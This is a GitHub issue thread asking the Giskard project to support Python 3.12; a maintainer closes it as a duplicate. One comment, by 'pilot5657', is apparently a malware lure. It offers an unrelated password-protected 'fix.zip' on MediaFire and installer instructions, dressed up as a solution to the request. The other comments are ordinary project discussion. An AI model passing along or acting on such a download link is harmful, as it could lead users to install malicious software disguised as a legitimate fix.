### ISSUE TITLE
Add support for python 3.12

### ISSUE THREAD

**Issue by tituslhy** [Giskard-AI/giskard#2006]
## 🚀 Feature Request
Giskard currently supports up till python 3.11. This request is to extend support for python 3.12.

## 🔈 Motivation

Python 3.12 has had a number of significant improvements over python 3.11 especially on the asyncio front. [Python 3.12 improvements](https://docs.python.org/3/whatsnew/3.12.html)

I'm not sure about everyone else but I've been using python 3.12 since its launch and have been very happy with its performance because LLM applications must run asynchronously in live production. I hope that Giskard will consider extending support for python 3.12.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kevinmessiaen** [comment]
Hello, this should be available soon, we are testing it to make sure everything works fine

I close this issue since we have another one for #1976
